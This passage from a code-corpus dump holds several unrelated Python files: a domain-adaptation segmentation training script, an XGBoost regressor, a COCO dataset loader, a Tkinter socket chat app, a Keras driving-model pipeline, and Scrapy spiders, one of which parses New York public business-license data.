[IMG_DIM[0], IMG_DIM[1], NO_FILTERS]\nin_dim2 = [IMG_DIM[0]//(2**(RES_STEPS-1)), IMG_DIM[1]//(2**(RES_STEPS-1)), NO_FILTERS*(2**RES_STEPS)]\n\ncnn_model = base_cnn.define_dual_cnn(in_dim1, in_dim2, NO_DOMAINS)\nunet_model = u_net2.UNet2D(in_channels=NO_CHANNELS, out_classes=NO_CLASSES, img_shape = [IMG_DIM[0], IMG_DIM[1], NO_CHANNELS], no_filters=NO_FILTERS, resolution_steps=RES_STEPS)\n\nlearning_rate_function_seg = tfk.optimizers.schedules.PiecewiseConstantDecay(boundaries = [150*NO_TRAIN_STEPS, 1000*NO_TRAIN_STEPS], values = [1e-3, 1e-4, 1e-5])\nlearning_rate_function_class = tfk.optimizers.schedules.PiecewiseConstantDecay(boundaries = [150*NO_TRAIN_STEPS, 400*NO_TRAIN_STEPS], values = [1e-3, 1e-4, 1e-5])\n\noptimizer_seg = tfk.optimizers.Adam(learning_rate_function_seg)\noptimizer_class = tfk.optimizers.Adam(learning_rate_function_class)\n\ndice_loss = losses.MultiClassDice()\ndice_plus_xent = losses.MultiClassDiceXent()\ncat_xent = tfk.losses.CategoricalCrossentropy(from_logits=True)\ncat_acc = tf.keras.metrics.CategoricalAccuracy()\n\ndomain_dataset = tf.data.Dataset.from_generator(lambda: utils.get_domain_data(TRAIN_DIR,NO_DOMAINS), (tf.float32, tf.float32, tf.float32), \\\n (tf.TensorShape([None,None,None,None]),tf.TensorShape([None,None,None,None]),tf.TensorShape([None]))).repeat()\ndomain_dataset = domain_dataset.map(lambda x, y, z: augmentation.tf_do_domain_augmentation2(x, y, z, IMG_DIM, NO_CHANNELS, NO_CLASSES, NO_DOMAINS), \n num_parallel_calls=4).batch(BATCH_SIZE,drop_remainder=True).prefetch(1)\nunlabelled_dataset = tf.data.Dataset.from_generator(lambda: utils.get_domain_data_only(UNLABELLED_TRAIN_DIR,NO_DOMAINS), (tf.float32, tf.float32), \\\n (tf.TensorShape([None,None,None,None]), tf.TensorShape([None]))).repeat()\nunlabelled_dataset = unlabelled_dataset.map(lambda x, y: augmentation.tf_do_domain_only_augmentation2(x, y, IMG_DIM, NO_CHANNELS, NO_DOMAINS), \n num_parallel_calls=4).batch(BATCH_SIZE//4,drop_remainder=True).prefetch(1)\ndomain_valid_dataset = tf.data.Dataset.from_generator(lambda: utils.get_domain_data(VALID_DIR, NO_DOMAINS), (tf.float32, tf.float32, tf.float32), \\\n (tf.TensorShape([None,None,None,None]),tf.TensorShape([None,None,None,None]),tf.TensorShape([None]))).repeat()\ndomain_valid_dataset = domain_valid_dataset.map(lambda x, y, z: augmentation.tf_do_domain_valid_crop(x, y, z, IMG_DIM, NO_CHANNELS, NO_CLASSES, NO_DOMAINS), \n num_parallel_calls=4).batch(BATCH_SIZE,drop_remainder=True).prefetch(1)\n\nalpha = 0.\nreverse_alpha = tf.constant([-alpha])\n\n@tf.function\ndef train_step_seg(inputs, targets):\n \n with tf.GradientTape() as tape:\n y_ = unet_model(inputs, training=True)\n loss_value = dice_plus_xent(y_true=targets, y_pred=y_)\n \n grads = tape.gradient(loss_value, unet_model.trainable_variables)\n optimizer_seg.apply_gradients(zip(grads, unet_model.trainable_variables))\n\n return loss_value\n\n@tf.function\ndef train_step_class(inputs, targets):\n \n with tf.GradientTape() as tape:\n y_ = cnn_model(inputs, training=True)\n loss_value = cat_xent(y_true=targets, y_pred=y_)\n \n grads = tape.gradient(loss_value, cnn_model.trainable_variables)\n optimizer_class.apply_gradients(zip(grads, cnn_model.trainable_variables))\n\n return loss_value\n\n@tf.function\ndef train_step_adv(inputs, targets):\n with tf.GradientTape() as tape:\n x,y = unet_model.encode(inputs,training=True)\n rep = unet_model.decode(x,y,training=True)\n classified_rep = cnn_model([rep, x] ,training=True)\n loss_value = cat_xent(y_true=targets, y_pred=classified_rep)\n\n grads_adv = tape.gradient(loss_value, unet_model.trainable_variables)\n reversed_grads_adv = [(reverse_alpha*g, v) if ('conv' in v.name) and ('encode' in v.name or 'decode' in v.name) else (g, v) for g, v in zip(grads_adv, unet_model.trainable_variables)]\n optimizer_seg.apply_gradients(reversed_grads_adv)\n \n return loss_value\n\niter_data = iter(domain_dataset)\niter_valid_data = iter(domain_valid_dataset)\niter_unlabel_data = iter(unlabelled_dataset)\nfor epoch in range(NO_EPOCHS):\n epoch_loss_avg_seg = tf.keras.metrics.Mean()\n epoch_loss_avg_class = tf.keras.metrics.Mean()\n epoch_dice = tf.keras.metrics.Mean()\n epoch_class_accuracy = tf.keras.metrics.Mean()\n \n if epoch > 300 and alpha < 1.:\n alpha += 0.0065\n reverse_alpha = tf.constant([-alpha])\n\n for _ in range(NO_TRAIN_STEPS):\n xs, ys, ds = next(iter_data)\n if epoch < 151 or epoch > 300:\n loss_value_seg = train_step_seg(xs, ys)\n epoch_loss_avg_seg.update_state(loss_value_seg)\n\n if epoch > 150:\n xu, du = next(iter_unlabel_data)\n\n x_adv = tf.concat([xs, xu], 0)\n d_adv = tf.concat([ds, du], 0)\n inds = tf.range( BATCH_SIZE + BATCH_SIZE // 4 )\n inds = tf.random.shuffle(inds)\n x_adv = tf.gather(x_adv, inds, axis = 0)\n d_adv = tf.gather(d_adv, inds, axis = 0)\n\n zclass, feats = unet_model.encode(x_adv)\n xclass = unet_model.decode(zclass, feats)\n loss_value_class = train_step_class([xclass, zclass], d_adv)\n epoch_loss_avg_class.update_state(loss_value_class)\n\n if alpha > 0:\n loss_value_adv = train_step_adv(x_adv, d_adv)\n\n y_ = unet_model(xs, training=False)\n epoch_dice.update_state(1 - dice_loss(y_true=ys, y_pred=y_))\n if epoch > 150:\n y_ = cnn_model([xclass, zclass], training=False)\n epoch_class_accuracy.update_state(cat_acc(y_true=d_adv, y_pred=y_))\n else:\n epoch_class_accuracy.update_state(0.0)\n\n epoch_valid_dice = tf.keras.metrics.Mean()\n for _ in range(NO_VALID_STEPS):\n xv, yv, _ = next(iter_valid_data) \n y_ = unet_model(xv, training=False)\n epoch_valid_dice.update_state(1 - dice_loss(y_true=yv, y_pred=y_))\n\n if epoch % 50 == 0:\n unet_model.reset_metrics()\n unet_model.save_weights(os.path.join(\"da_seg_model_weights\", \"cp-{:03d}.ckpt\".format(epoch)), save_format = 'tf')\n cnn_model.reset_metrics()\n cnn_model.save_weights(os.path.join(\"da_class_model_weights\", \"cp-{:03d}.ckpt\".format(epoch)), save_format = 'tf')\n\n print(\"Epoch {:03d}: Seg Loss: {:.3f}\".format(epoch, epoch_loss_avg_seg.result()),flush=True)\n print(\"Epoch {:03d}: Class Loss: {:.3f}\".format(epoch, epoch_loss_avg_class.result()),flush=True)\n print(\"Epoch {:03d}: Dice: {:.3f}\".format(epoch, epoch_dice.result()),flush=True)\n print(\"Epoch {:03d}: Class Accuracy: {:.3f}\".format(epoch, epoch_class_accuracy.result()),flush=True)\n print(\"Epoch {:03d}: Validation Dice: {:.3f}\".format(epoch, epoch_valid_dice.result()),flush=True)\n\nunet_model.reset_metrics()\nunet_model.save_weights(os.path.join(\"da_seg_model_weights\", \"cp-final.ckpt\"), save_format = 'tf')\ncnn_model.reset_metrics()\ncnn_model.save_weights(os.path.join(\"da_class_model_weights\", \"cp-final.ckpt\"), save_format = 'tf')\n","sub_path":"da_main.py","file_name":"da_main.py","file_ext":"py","file_size_in_byte":8301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"600166096","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport xgboost as xgb\n\ndata_df = pd.read_csv('lianjia.csv') \n\ndata_df = data_df.drop('code', axis=1)\n\ny_all = data_df['price']\nX_all = data_df.drop('price', axis=1)\n\nX_train, X_test, y_train, y_test = train_test_split(X_all, y_all, test_size=0.15, random_state=818)\n\n\nreg_model = xgb.XGBRegressor(max_depth=9, # 构建树的深度,越大越容易过拟合\n n_estimators=10, # 最佳迭代次数\n learning_rate=0.1, # 学习率\n n_jobs=-1) # 启动cpu所有核\nreg_model.fit(X_train, # 训练集\n y_train, # 训练集标签\n eval_set=[(X_train, y_train)], # 验证集\n verbose=10, # 训练多少轮打印一次结果\n early_stopping_rounds=10 # 每经过10轮rmse必须下降,否则停止训练\n )\n\ny_pred=reg_model.predict(X_test)\n\ntest_df = pd.DataFrame()\ntest_df['price'] = y_test\ntest_df['p_price'] = y_pred\ntest_df['abs_err'] = abs(test_df['price'] - test_df['p_price'])\ntest_df['rate_err'] = test_df['abs_err'] / test_df['price']\n\nprint('abs err:', test_df['abs_err'].mean())\nprint('rate err:', test_df['rate_err'].mean())\ntest_df.to_csv('test.csv')","sub_path":"h_xgboost_0.01.py","file_name":"h_xgboost_0.01.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"162550835","text":"import torch\nimport torchvision\nfrom torch.utils import data\n\nfrom pycocotools.coco import COCO as COCOapi\n\nimport os.path as path\nimport skimage.io as io\nimport numpy as np\n\nSUBSET_LEN = 50\n\nclass COCO(data.Dataset):\n def __init__(self, root,\n mode= \"train\", # choose between \"train\", \"val\"\n is_subset= False, # If is subset, the length will be a fixed small length\n max_n_objects= 12, # Due to make a batch of data, the one-hot mask has to be consistent\n sort_anns= False, # Due to multiple anns, sort the anns to get masks as big as possible\n ):\n self._root = root\n self._mode = mode\n self._is_subset = is_subset\n self._max_n_objects = max_n_objects\n self._sort_anns= sort_anns\n\n self.coco = COCOapi(\n path.join(self._root, \"annotations/instances_{}2017.json\".format(self._mode))\n )\n # load categories\n self._cats = self.coco.loadCats(self.coco.getCatIds())\n self._catNms = list(set([cat['name'] for cat in self._cats]))\n self._supNms = list(set([cat['supercategory'] for cat in self._cats]))\n self._output_mode = dict(catNms= None, is_supcats= False)\n\n # reset self mode to all categories\n self.set_cats()\n\n @property\n def n_objects(self):\n \"\"\" NOTE: this method depends on category mode (refer to set_cats).\n And background is also marked as an object\n \"\"\"\n if self._output_mode[\"is_supcats\"]:\n return len(self._supNms)+1\n else:\n return len(self._catNms)+1\n\n @property\n def all_categories(self):\n return self._cats\n\n @property\n def all_categories_names(self):\n return self._catNms\n\n @property\n def all_super_categories_names(self):\n return self._supNms\n\n def set_cats(self, cats: list= None, is_supcats= True):\n \"\"\" Given category, the dataset will only output all items from that dataset.\n And configure the output mask is in terms of supcats or cats.\n If not provided, all images will be output from __getitem__\n \"\"\"\n self._output_mode[\"catNms\"] = cats\n self._output_mode[\"is_supcats\"] = is_supcats\n\n if self._output_mode[\"catNms\"] is None:\n self.imgIds = self.coco.getImgIds()\n else:\n catNms = self._output_mode[\"catNms\"]\n if self._output_mode[\"is_supcats\"]:\n self.imgIds = self.coco.getImgIds(\n imgIds= self.coco.getImgIds(),\n catIds= self.coco.getCatIds(supNms= catNms)\n )\n else:\n self.imgIds = self.coco.getImgIds(\n imgIds= self.coco.getImgIds(),\n catIds= self.coco.getCatIds(catNms= catNms)\n )\n\n def __len__(self):\n if self._is_subset:\n return SUBSET_LEN\n else:\n return len(self.imgIds)\n\n def __getitem__(self, idx):\n if self._is_subset:\n idx = min(SUBSET_LEN, idx)\n\n try:\n img = self.coco.loadImgs(self.imgIds[idx])[0]\n except:\n raise ValueError(\"Wrong index: {}\".format(idx))\n # This image is in (H, W, C) shape\n image = io.imread('%s/images/%s'%(\n self._root,\n img['file_name']\n )).astype(np.float32)\n\n annIds = self.coco.getAnnIds(imgIds= img[\"id\"])\n anns = self.coco.loadAnns(annIds)\n if self._sort_anns:\n # put the masks with greatest area at 0-th\n anns.sort(key= lambda x: x[\"area\"], reverse= True)\n\n # incase of gray-scale image\n if len(image.shape) == 2:\n image = np.tile(image, (3,1,1)).transpose(1,2,0)\n elif len(image.shape) == 3:\n pass\n else:\n raise ValueError(\"Wrong image shape dimensions\\n{}\".format(str(img)))\n H, W, _ = image.shape\n\n # create a bounding box array with (idx0, idx1, H, W) notion.\n # NOTE: it is a bit different from COCO image for the simplicity\n bboxs = np.zeros((self._max_n_objects, 4), dtype= np.float32)\n mask = np.zeros((H, W, self._max_n_objects), dtype= np.uint8)\n bg = np.ones((H, W, 1), dtype= np.uint8) # a background\n\n n_objects = 0\n for ann_i, ann in enumerate(anns):\n \"\"\" Because of the multi-object tracking problem, there is no need to assign to\n specific index.\n \"\"\"\n if n_objects >= self._max_n_objects: break\n\n ann_mask = self.coco.annToMask(ann)\n mask[:, :, ann_i] = ann_mask\n bg[:, :, 0] &= (1-ann_mask)\n\n coco_box = ann[\"bbox\"]\n bboxs[ann_i, 0] = coco_box[1]\n bboxs[ann_i, 1] = coco_box[0]\n bboxs[ann_i, 2] = coco_box[3]\n bboxs[ann_i, 3] = coco_box[2]\n\n n_objects += 1\n mask = np.concatenate([bg, mask], axis= 2)\n\n # make the output with dimension order: (C, H, W)\n # NOTE: each data might not have the same resolution\n image = image.transpose(2,0,1).astype(np.float32) / 255\n mask = mask.transpose(2,0,1).astype(np.uint8)\n return dict(\n image= torch.from_numpy(image), # pixel in [0, 1] scale\n mask= torch.from_numpy(mask), # NOTE: 0-th dimension of mask is (n_cats+1), \n # the order of the mas depends on self._supNms or self._catNms\n n_objects= torch.tensor(n_objects),\n )\n\nif __name__ == \"__main__\":\n # test code\n import ptvsd\n import sys\n # ip_address = ('0.0.0.0', 5050)\n # print(\"Process: \" + \" \".join(sys.argv[:]))\n # print(\"Is waiting for attach at address: %s:%d\" % ip_address, flush= True)\n # # Allow other computers to attach to ptvsd at this IP address and port.\n # ptvsd.enable_attach(address=ip_address, redirect_output= True)\n # # Pause the program until a remote debugger is attached\n # ptvsd.wait_for_attach()\n # print(\"Process attached, start running into experiment...\", flush= True)\n # ptvsd.break_into_debugger()\n\n root = sys.argv[1]\n dataset = COCO(root)\n\n dataloader = data.DataLoader(dataset,\n batch_size=128, \n shuffle= True, \n num_workers= 48\n )\n\n for i, b in enumerate(dataloader):\n print(\"Get a batch, {}: type({})\".format(i, type(b)))\n\n print(\"debug done...\")\n \n\n ","sub_path":"vos/datasets/COCO.py","file_name":"COCO.py","file_ext":"py","file_size_in_byte":6397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"229357764","text":"import scrapy\nfrom scrapy.crawler import CrawlerProcess\nfrom spider_malaysiakini import MKiniSpider\n\nfrom twisted.internet import reactor\nfrom twisted.internet.task import deferLater\n\ndef crash(failure):\n print('oops, spider crashed')\n print(failure.getTraceback())\n \ndef sleep(self, *args, seconds):\n \"\"\"Non blocking sleep callback\"\"\"\n return deferLater(reactor, seconds, lambda: None)\n\nprocess = CrawlerProcess()\nwait_time = 60*10\n\ndef _crawl(result, spider):\n deferred = process.crawl(spider)\n deferred.addCallback(lambda results: print('waiting {} seconds before restart...'.format(wait_time)))\n deferred.addErrback(crash) # <-- add errback here\n deferred.addCallback(sleep, seconds=wait_time) # wait 10 minutes\n deferred.addCallback(_crawl, spider)\n return deferred\n\n_crawl(None, MKiniSpider) # Infinite crawl\nprocess.start()\n\n","sub_path":"Spider/archive/run_malaysiakini_crawler.py","file_name":"run_malaysiakini_crawler.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"90089478","text":"#!/usr/bin/env python3\n\nimport socket\nimport threading\nimport tkinter\nimport time\nfrom tkinter import ttk\nfrom queue import Queue\n\nINPUT_PORT = 38802\nOUTPUT_PORT = 38801\nSIZE = 1024\n\nclass Client(threading.Thread):\n\n def __init__(self, queue):\n super().__init__()\n self.daemon = True\n self.queue = queue\n\n def run(self):\n while True:\n msg = self.queue.get()\n server = socket.socket()\n host = socket.gethostname()\n server.connect((host, OUTPUT_PORT))\n server.send(bytes(msg, \"utf-8\"))\n server.close()\n\nclass Server(threading.Thread):\n\n def __init__(self, client, addr, queue):\n super().__init__()\n self.client = client\n self.addr = addr\n self.queue = queue\n self.daemon = True\n\n def run(self):\n while True:\n msg = self.client.recv(SIZE)\n if not msg:\n break\n self.queue.put(msg.decode(\"utf-8\"))\n self.client.close()\n\nclass HandleRequest(threading.Thread):\n\n def __init__(self, queue):\n super().__init__()\n self.queue = queue\n self.daemon = True\n self.server = socket.socket()\n self.host = socket.gethostname()\n\n def run(self):\n self.server.bind((self.host, INPUT_PORT))\n self.server.listen(5)\n while True:\n client, addr = self.server.accept()\n server_thread = Server(client, addr, self.queue)\n server_thread.start()\n \n\nclass MainWindow(tkinter.Frame):\n\n def __init__(self, parent):\n super().__init__(parent)\n self.parent = parent\n self.parent.title(\"První GUI aplikace\")\n self.parent.rowconfigure(0, weight=700)\n self.parent.rowconfigure(1, weight=200)\n self.parent.rowconfigure(2, weight=100)\n self.parent.columnconfigure(0, weight=800)\n self.parent.columnconfigure(1, weight=100)\n self.parent.columnconfigure(2, weight=100)\n self.create_widgets()\n self.in_queue = Queue()\n self.out_queue = Queue()\n self.client_thread = Client(self.out_queue)\n self.client_thread.start()\n self.server_thread = HandleRequest(self.in_queue)\n self.server_thread.start()\n self.check_message()\n\n def create_widgets(self):\n self.scroll_bar_y = ttk.Scrollbar(orient = tkinter.VERTICAL)\n self.scroll_bar_x = ttk.Scrollbar(orient = tkinter.HORIZONTAL)\n self.notepad = tkinter.Text(undo = True,\n state = \"disabled\",\n wrap = tkinter.NONE,\n yscrollcommand = self.scroll_bar_y.set,\n xscrollcommand = self.scroll_bar_x.set,\n )\n self.entry = tkinter.Entry(text=\"\")\n self.button = ttk.Button(text=\"Odeslat\")\n \n self.button[\"command\"] = self.send_message\n self.scroll_bar_y[\"command\"] = self.notepad.yview\n self.scroll_bar_x[\"command\"] = self.notepad.xview\n\n self.notepad.grid(row=0, column=0, columnspan=2, sticky=tkinter.NSEW, padx=2, pady=2)\n self.scroll_bar_y.grid(row=0, column=2, sticky=tkinter.NS)\n self.scroll_bar_x.grid(row=1, column=0, columnspan=2, sticky=tkinter.EW)\n self.entry.grid(row=2, column=0, sticky=tkinter.NSEW, padx=2)\n self.button.grid(row=2, column=1, columnspan=2, sticky=tkinter.NSEW)\n\n def check_message(self):\n if not self.in_queue.empty():\n text = self.in_queue.get()\n self.notepad.configure(state=\"normal\")\n self.notepad.insert(tkinter.END, \"<<< \"+text+\"\\n\")\n self.notepad.configure(state=\"disabled\")\n self.parent.after(100, self.check_message)\n\n def send_message(self):\n text = self.entry.get()\n if text:\n self.out_queue.put(text)\n self.notepad.configure(state=\"normal\")\n self.notepad.insert(tkinter.END, \">>> \"+text+\"\\n\")\n self.notepad.configure(state=\"disabled\")\n \n\nroot = tkinter.Tk()\napp = MainWindow(root)\napp.mainloop()\n","sub_path":"test-gui–2.py","file_name":"test-gui–2.py","file_ext":"py","file_size_in_byte":4161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"199156604","text":"import numpy as np\nimport sys\n\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\n\nsys.path.append(\".\")\nimport pandas as pd\n\nimport logging\n\nfrom src.steps.augumentation.augmentors import adjust_gamma_dark, night_effect, add_random_shadow, \\\n augment_brightness_camera_images, horizontal_flip\nfrom src.steps.models.nvidia_autopilot import model_categorical\n\nlogging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO)\nlogging.basicConfig(format='%(levelname)s: %(message)s', level=logging.DEBUG)\nlogging.basicConfig(format='%(levelname)s: %(message)s', level=logging.ERROR)\n\ndef Augment(image, steer):\n if np.random.random() > 0.75:\n image = adjust_gamma_dark(image)\n elif np.random.random() > 0.75:\n image = night_effect(image)\n elif np.random.random() > 0.75:\n image = add_random_shadow(image)\n elif np.random.random() > 0.75:\n image = augment_brightness_camera_images(image)\n elif np.random.random() > 0.75:\n image = augment_brightness_camera_images(image)\n image = add_random_shadow(image)\n image, steer = horizontal_flip(image, steer)\n\n return image, steer\n\n\n\n#from keras.callbacks import EarlyStopping, ModelCheckpoint\n\n# \"optimizer\"\n# \"loss\"\n# \"metrics\"\nfrom src.steps.core.parameters import pipeline_parameters\nfrom sklearn.model_selection import train_test_split\nfrom src.steps.core.datasets import DatasetStorage, DatasetInfo, OneDatasetInMemorySampleGenerator\n\n###################################\n# LOAD DATASETS INFORMATION\n###################################\n\n# 0 axionaut-axionable_data data/datasets\\axionaut-axionable_data (90, 250, 3) 26449 26434\n# 1 axionaut-ironcar_data-new_track data/datasets\\axionaut-ironcar_data-new_track (90, 250, 3) 1519 0\n# 2 axionaut-ironcar_data-old_track data/datasets\\axionaut-ironcar_data-old_track (90, 250, 3) 16028 0\n# 3 axionaut-new data/datasets\\axionaut-new (90, 250, 3) 3169 0\n# 4 ironcar-friend-shared data/datasets\\ironcar-friend-shared (150, 250, 3) 4074 0\n# 5 ironcar-shared data/datasets\\ironcar-shared (150, 250, 3) 4545 0\n\ndatasets_storage = DatasetStorage(pipeline_parameters[\"datasets_path\"], ds_filter=[\"axionaut-axionable_data\", \"ironcar-shared\"])\ndatasets_infos = datasets_storage.get_datasets_infos()\ndatasets = datasets_storage.get_datasets()\n\nprint(\"==================\\n Datasets\\n==================\\n\")\nprint(pd.DataFrame(map(lambda x: x.__dict__, datasets_infos))[[\"name\", \"path\", \"image_size\", \"samples_count\", \"corrected_samples_count\"]])\n\n# Check dataset dimensions\ndf_dims = pd.DataFrame(map(lambda x: x.image_size, datasets_infos))\ndf_dims.columns = [\"H\", \"W\", \"B\"]\ncrop_window = []\nfor dim in df_dims.columns:\n widths = df_dims[dim].unique()\n if len(widths) > 1:\n logging.info(\"Datasets have different {} dimensions will automatically crop to minimal:\".format(dim) + str(np.min(widths)))\n crop_window.append(np.min(widths))\n\ncrop_window = tuple(crop_window)\nlogging.info(\"Crop window is {}\".format(crop_window))\n\n###################################\n# SPLIT TRAIN / TEST\n###################################\nsample_generator = OneDatasetInMemorySampleGenerator(dataset_storage=datasets_storage)\nlarge_index = sample_generator.get_mlutidataset_index()\n\nindex_train, index_test = train_test_split(large_index, test_size=0.15)\n\nnum_train = len(index_train)\nnum_valid = len(index_test)\n\n###################################\n# BUILD A LAZY GENERATOR\n###################################\ntrain_generator = OneDatasetInMemorySampleGenerator(dataset_storage=datasets_storage)\ntest_generator = OneDatasetInMemorySampleGenerator(dataset_storage=datasets_storage)\n\n###################################\n# BUILD A MODEL\n###################################\nmodel = model_categorical(input_size=crop_window)\nmodel.summary()\n\nmodel.compile(\n optimizer=pipeline_parameters[\"optimizer\"],\n loss=pipeline_parameters[\"loss\"],\n metrics=pipeline_parameters['metrics'])\n\n###################################\n# TRAINING PARAMS\n###################################\nearly_stop = EarlyStopping(\n monitor='val_loss',\n min_delta=0.0005,\n patience=5,\n mode='auto',\n verbose=1)\n\ncheckpoint = ModelCheckpoint(\n pipeline_parameters[\"checkpoint.filename\"],\n monitor=pipeline_parameters['checkpoint.monitor'],\n verbose=pipeline_parameters[\"checkpoint.verbose\"],\n save_best_only=pipeline_parameters[\"checkpoint.save_best_only\"],\n mode=pipeline_parameters[\"checkpoint.mode\"],\n period=pipeline_parameters[\"checkpoint.period\"])\n\n# batch generator\nBATCH_SIZE = pipeline_parameters[\"BATCH_SIZE\"]\n\n###################################\n# FIT\n###################################\nmodel.fit_generator(\n generator = train_generator.sample_generator(BATCH_SIZE, shuffle=False, index_subset=index_train, crop=crop_window),\n samples_per_epoch = num_train,\n nb_epoch = pipeline_parameters[\"nb_epoch\"],\n verbose = 1,\n validation_data = test_generator.sample_generator(BATCH_SIZE, shuffle=False, index_subset=index_test, crop=crop_window),\n nb_val_samples = num_valid,\n callbacks = [early_stop, checkpoint])\n\n","sub_path":"src/steps/pipelines/standard_pipeline_2018.py","file_name":"standard_pipeline_2018.py","file_ext":"py","file_size_in_byte":5424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"265871830","text":"# -*- coding: utf-8 -*-\n\n'''\nCreated on 2019-Jun-18 09:24:01\nTICKET NUMBER -AI_32\n@author: muhil\n'''\n\nfrom scrapy.spiders import CSVFeedSpider\nfrom scrapy.loader import ItemLoader\nfrom scrapy.loader.processors import MapCompose\nfrom w3lib.html import remove_tags, replace_escape_chars\n\nfrom Data_scuff.spiders.AI_32.items import NySosCompaniesBusinessLicensesSpiderItem\nfrom Data_scuff.spiders.__common import CustomSettings\nfrom Data_scuff.spiders.__common import DataFormatterMixin,LookupDatareaderMixin\nfrom Data_scuff.utils.utils import Utils\n\n\n\nclass NySosCompaniesBusinessLicensesSpider(CSVFeedSpider,LookupDatareaderMixin, DataFormatterMixin):\n name = '32_ny_sos_companies_business_licenses'\n allowed_domains = ['ny.gov']\n start_urls = ['https://data.ny.gov/api/views/n9v6-gdp6/rows.csv?accessType=DOWNLOAD']\n # start_urls = ['file:///home/muhil/Downloads/Active_Corporations___Beginning_1800.csv']\n\n # headers = ['id', 'name', 'description', 'image_link']\n # delimiter = '\\t'\n \n custom_settings = {\n 'FILE_NAME':Utils.getRundateFileName('AI-32_Companies_SOS_NY_CurationReady'),\n 'JIRA_ID':'AI_32',\n 'DOWNLOAD_DELAY':0.2,\n 'COOKIES_ENABLED':True,\n 'COOKIES_DEBUG':True,\n 'HTTPCACHE_ENABLED':False,\n # 'CSV_DELIMITER':'|',\n 'DOWNLOADER_MIDDLEWARES':CustomSettings.appenDownloadMiddlewarevalues({\n 'scrapy.downloadermiddlewares.httpcompression.HttpCompressionMiddleware':None,\n 'Data_scuff.middleware.httpcompression.CustomHttpCompressionMiddleWare':590,\n }),\n # 'JOBDIR' : CustomSettings.getJobDirectory('ny_sos_companies_business_licenses'),\n 'TOP_HEADER':{ 'company_name': 'Current Entity Name',\n 'company_subtype': 'Entity Type',\n 'county': 'County',\n 'creation_date': 'Initial DOS Filing Date',\n 'dba_name': '',\n 'dos process name': 'DOS Process Name',\n 'jurisdiction': 'Jurisdiction',\n 'location name': 'Location Name',\n 'location_address_string': '',\n 'mail_address_string': 'DOS Process Address',\n 'mixed_name': '',\n 'mixed_subtype': '',\n 'permit_lic_desc': '',\n 'permit_lic_no': 'DOS ID',\n 'permit_type': '',\n 'person_address_string': ''},\n 'FIELDS_TO_EXPORT':[ \n 'permit_lic_no',\n 'company_name',\n 'dba_name',\n 'creation_date',\n 'county',\n 'jurisdiction',\n 'company_subtype',\n 'dos process name',\n 'mail_address_string',\n 'mixed_name',\n 'mixed_subtype',\n 'person_address_string',\n 'location name',\n 'location_address_string',\n 'permit_lic_desc',\n 'permit_type',\n 'url',\n 'sourceName',\n 'ingestion_timestamp'\n ],\n 'NULL_HEADERS':['jurisdiction', 'county', 'location name', 'dos process name']\n }\n\n # Do any adaptations you need here\n #def adapt_response(self, response):\n # return response\n\n def parse_row(self, response, row):\n data_dic={}\n data_dic['county']= row.get('County','')\n data_dic['jurisdiction']= row['Jurisdiction']\n data_dic['permit_lic_no']=row['DOS ID']\n company_name=self._getDBA(row['Current Entity Name'])\n data_dic['dos process name']= row['DOS Process Name']\n data_dic['creation_date']=row['Initial DOS Filing Date']\n data_dic['company_name']=company_name[0]\n data_dic['permit_lic_desc']='Business License for '+company_name[0] if company_name else 'Business License'\n data_dic['dba_name']=company_name[1]\n data_dic['company_subtype']= row['Entity Type'] if row['Entity Type'] else 'Business License'\n address=[]\n if row['DOS Process Address 1']:\n address.append(row['DOS Process Address 1'])\n if row['DOS Process Address 2']:\n address.append(row['DOS Process Address 2'])\n dos_address=self.format__address_4(' '.join(address),row['DOS Process City'],row['DOS Process State'],row['DOS Process Zip'])\n data_dic['mail_address_string']=dos_address\n data_dic['location name']= row['Location Name']\n locat_address=[]\n if row['Location Address 1']:\n locat_address.append(row['Location Address 1'])\n if row['Location Address 2']:\n locat_address.append(row['Location Address 2'])\n location_address=self.format__address_4(' '.join(locat_address),row['Location City'],row['Location State'],row['Location Zip'])\n data_dic['location_address_string']= location_address if location_address else (dos_address if dos_address else 'NY')\n c=0\n if row.get('CEO Name'):\n data_dic['company_name']=company_name[0] if company_name[0] else row.get('CEO Name',' ')\n il=self.save_csv(response,data_dic)\n il.add_value('mixed_name', row['CEO Name'])\n\n ceo_address=[]\n if row['CEO Address 1']:\n ceo_address.append(row['CEO Address 1'])\n if row['CEO Address 2']:\n ceo_address.append(row['CEO Address 2'])\n mix_address=self.format__address_4(' '.join(ceo_address),row['CEO City'],row['CEO State'],row['CEO Zip'])\n il.add_value('person_address_string', mix_address)\n il.add_value('mixed_subtype', 'CEO')\n c=1\n yield il.load_item()\n if row['Registered Agent Name']:\n data_dic['company_name']=company_name[0] if company_name[0] else row.get('Registered Agent Name',' ')\n il=self.save_csv(response,data_dic)\n il.add_value('mixed_name', row['Registered Agent Name'])\n c=1\n agent_address=[]\n if row['Registered Agent Address 1']:\n agent_address.append(row['Registered Agent Address 1'])\n if row['Registered Agent Address 2']:\n agent_address.append(row['Registered Agent Address 2'])\n mix_address=self.format__address_4(' '.join(agent_address),row['Registered Agent City'],row['Registered Agent State'],row['Registered Agent Zip'])\n il.add_value('person_address_string', mix_address)\n il.add_value('mixed_subtype', 'Agent')\n yield il.load_item()\n if c==0:\n yield self.save_csv(response,data_dic).load_item()\n def save_csv(self,response,data_dic):\n il = ItemLoader(item=NySosCompaniesBusinessLicensesSpiderItem())\n il.add_value('ingestion_timestamp', Utils.getingestion_timestamp())\n il.add_value('sourceName', 'NY_SOS_Companies_Business_Licenses')\n il.add_value('url', 'https://data.ny.gov/Economic-Development/Active-Corporations-Beginning-1800/n9v6-gdp6')\n il.add_value('permit_type','business_license')\n for k in data_dic:\n il.add_value(k,data_dic[k])\n return il\n # yield 